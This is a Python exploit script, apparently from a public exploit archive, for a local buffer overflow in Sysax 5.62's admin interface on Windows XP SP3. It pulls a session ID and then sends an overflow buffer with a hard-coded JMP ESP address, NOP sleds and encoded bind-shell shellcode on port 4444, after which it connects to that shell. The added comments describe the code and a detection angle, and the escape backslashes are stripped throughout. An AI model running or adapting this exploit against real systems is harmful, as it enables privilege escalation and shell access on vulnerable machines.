# Title : Sysax <= 5.62 Admin Interface Local Buffer Overflow
# Published : 2012-06-20
# Author :
#!/usr/bin/python
##########################################################################################################
#Title: Sysax <= 5.62 Admin Interface Local Buffer Overflow
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit
#Date Discovered: June 15, 2012
#Vendor Contacted: June 19, 2012
#Details: http://www.pwnag3.com/2012/06/sysax-admin-interface-local-priv.html
##########################################################################################################
import socket,sys,time,re,base64,subprocess
def main():
    """Fetch the Sysax admin page over HTTP and pull the session id out of it.

    Reads the module-level ``target`` and ``port`` (assigned under
    ``__main__``), sends a bare GET for ``/scgi?``, keeps reading until the
    response contains ``</html>``, and stores the regex match for
    ``sid=`` followed by 40 alphanumerics in the global ``sid`` so that
    ``exploit()`` can reuse the same session.  Exits with status 1 if no
    such value is found in the page.
    """
    global login
    print "n"
    print "****************************************************************************"
    print " Sysax <= 5.62 Admin Interface Local Buffer Overflow "
    print " by @cd1zz www.pwnag3.com "
    print "****************************************************************************"
    #initial GET
    # Host and Referer are fixed to localhost:88 regardless of target/port.
    login = "GET /scgi? HTTP/1.1rn"
    login +="Host: localhost:88rn"
    login += "Referer: http://localhost:88rnrn"
    try:
        r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        r.connect((target, port))
        print "[+] Accessing admin interface"
        r.send(login)
    except Exception, e:
        # Connection errors are only reported; control falls through to the
        # receive loop below.
        print "[-] There was a problem"
        print e
    #loop the recv sock so we get the full page
    # Accumulate 4 KiB chunks until the closing html tag is seen, pausing
    # one second after each chunk.
    page = ''
    fullpage = ''
    while "</html>" not in fullpage:
        page = r.recv(4096)
        fullpage += page
        time.sleep(1)
    #regex the sid from the page
    # Expects the page body to carry a "sid=" query value of exactly 40
    # alphanumeric characters; the match object (not the string) is stored.
    global sid
    sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
    if sid is None:
        print "[-] There was a problem finding your SID"
        sys.exit(1)
    time.sleep(1)
    r.close()
def exploit():
    """Send the overflow request using the session id captured by ``main()``.

    Builds a base64-encoded buffer (392 bytes of filler, a 4-byte return
    address, a 20-byte NOP sled, the encoded shellcode, another sled) and
    POSTs it as the ``e2`` form field of
    ``/scgi?<sid>&pid=scriptpathbrowse2.htm`` on ``target``/``port``.  It
    then waits two seconds and runs a local telnet client against port
    4444, where the shellcode (a bind shell, per the msfpayload comment
    below) is expected to be listening.  Always exits with status 1 afterwards.

    Detection angle: on the wire this is a POST to ``/scgi`` whose ``e2``
    form value is several hundred bytes of base64, followed by a new
    listener appearing on TCP 4444 on the host.
    """
    #msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b "x00x0ax0d"
    # Opaque encoder output from the command above; it is sent verbatim and
    # never decoded or inspected by this script.
    shell = (
    "xdbxd5xd9x74x24xf4xb8xc3x8fxb3x3ex5bx33xc9"
    "xb1x56x31x43x18x03x43x18x83xebx3fx6dx46xc2"
    "x57xfbxa9x3bxa7x9cx20xdex96x8ex57xaax8ax1e"
    "x13xfex26xd4x71xebxbdx98x5dx1cx76x16xb8x13"
    "x87x96x04xffx4bxb8xf8x02x9fx1axc0xccxd2x5b"
    "x05x30x1cx09xdex3ex8exbex6bx02x12xbexbbx08"
    "x2axb8xbexcfxdex72xc0x1fx4ex08x8ax87xe5x56"
    "x2bxb9x2ax85x17xf0x47x7exe3x03x81x4ex0cx32"
    "xedx1dx33xfaxe0x5cx73x3dx1ax2bx8fx3dxa7x2c"
    "x54x3fx73xb8x49xe7xf0x1axaax19xd5xfdx39x15"
    "x92x8ax66x3ax25x5ex1dx46xaex61xf2xcexf4x45"
    "xd6x8bxafxe4x4fx76x1ex18x8fxdexffxbcxdbxcd"
    "x14xc6x81x99xd9xf5x39x5ax75x8dx4ax68xdax25"
    "xc5xc0x93xe3x12x26x8ex54x8cxd9x30xa5x84x1d"
    "x64xf5xbexb4x04x9ex3ex38xd1x31x6fx96x89xf1"
    "xdfx56x79x9ax35x59xa6xbax35xb3xd1xfcxfbxe7"
    "xb2x6axfex17x25x37x77xf1x2fxd7xd1xa9xc7x15"
    "x06x62x70x65x6cxdex29xf1x38x08xedxfexb8x1e"
    "x5ex52x10xc9x14xb8xa5xe8x2bx95x8dx63x14x7e"
    "x47x1axd7x1ex58x37x8fx83xcbxdcx4fxcdxf7x4a"
    "x18x9axc6x82xccx36x70x3dxf2xcaxe4x06xb6x10"
    "xd5x89x37xd4x61xaex27x20x69xeax13xfcx3cxa4"
    "xcdxbax96x06xa7x14x44xc1x2fxe0xa6xd2x29xed"
    "xe2xa4xd5x5cx5bxf1xeax51x0bxf5x93x8fxabxfa"
    "x4ex14xdbxb0xd2x3dx74x1dx87x7fx19x9ex72x43"
    "x24x1dx76x3cxd3x3dxf3x39x9fxf9xe8x33xb0x6f"
    "x0exe7xb1xa5")
    # Sled placed on both sides of the shellcode.
    nops = "x90" * 20
    #7CA7A787 FFE4 JMP ESP shell32.dll v6.00.2900.6072
    # Hard-coded return address tied to the shell32.dll build named above
    # (XP SP3 per the header); there is no version check before use.
    jmp_esp = "x87xA7xA7x7C"
    payload = base64.b64encode(("A" * 392 + jmp_esp + nops + shell + nops))
    #setup exploit
    # ``sid`` is the match object set by main(); group(0) is the whole
    # "sid=..." text.  Note the local name ``exploit`` shadows this function.
    exploit = "POST /scgi?"+str(sid.group(0))+"&pid=scriptpathbrowse2.htm HTTP/1.1rn"
    exploit += "Host: localhost:88rn"
    exploit += "Content-Type: application/x-www-form-urlencodedrn"
    # Content-Length covers "e2=" (3 bytes) plus the base64 value only; the
    # trailing line breaks appended below are not counted.
    exploit += "Content-Length: "+ str(len(payload)+3)+"rnrn"
    exploit += "e2="+payload+"rnrn"
    try:
        r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        r.connect((target, port))
        print "[+] Sending pwnag3"
        r.send(exploit)
    except Exception, e:
        # As in main(): errors are printed but do not stop the script.
        print "[-] There was a problem"
        print e
    time.sleep(2)
    print "[+] Here is your shell..."
    # Fixed command string (no external input), so shell=True is not an
    # injection concern here; 4444 is the LPORT from the msfpayload comment.
    subprocess.Popen("telnet localhost 4444", shell=True).wait()
    # Exit status is 1 even on the success path.
    sys.exit(1)
if __name__ == '__main__':
    # No command-line arguments are accepted.  The usage string is printed
    # literally; the "%s" is never substituted with the script name.
    if len(sys.argv) != 1:
        print "[-] Usage: %s"
        sys.exit(1)
    #by default it binds to 127.0.0.1 on 88
    # Module globals read by main() and exploit(); they are the only knobs
    # and are not configurable from the command line.
    target = "127.0.0.1"
    port = 88
    main()
    exploit()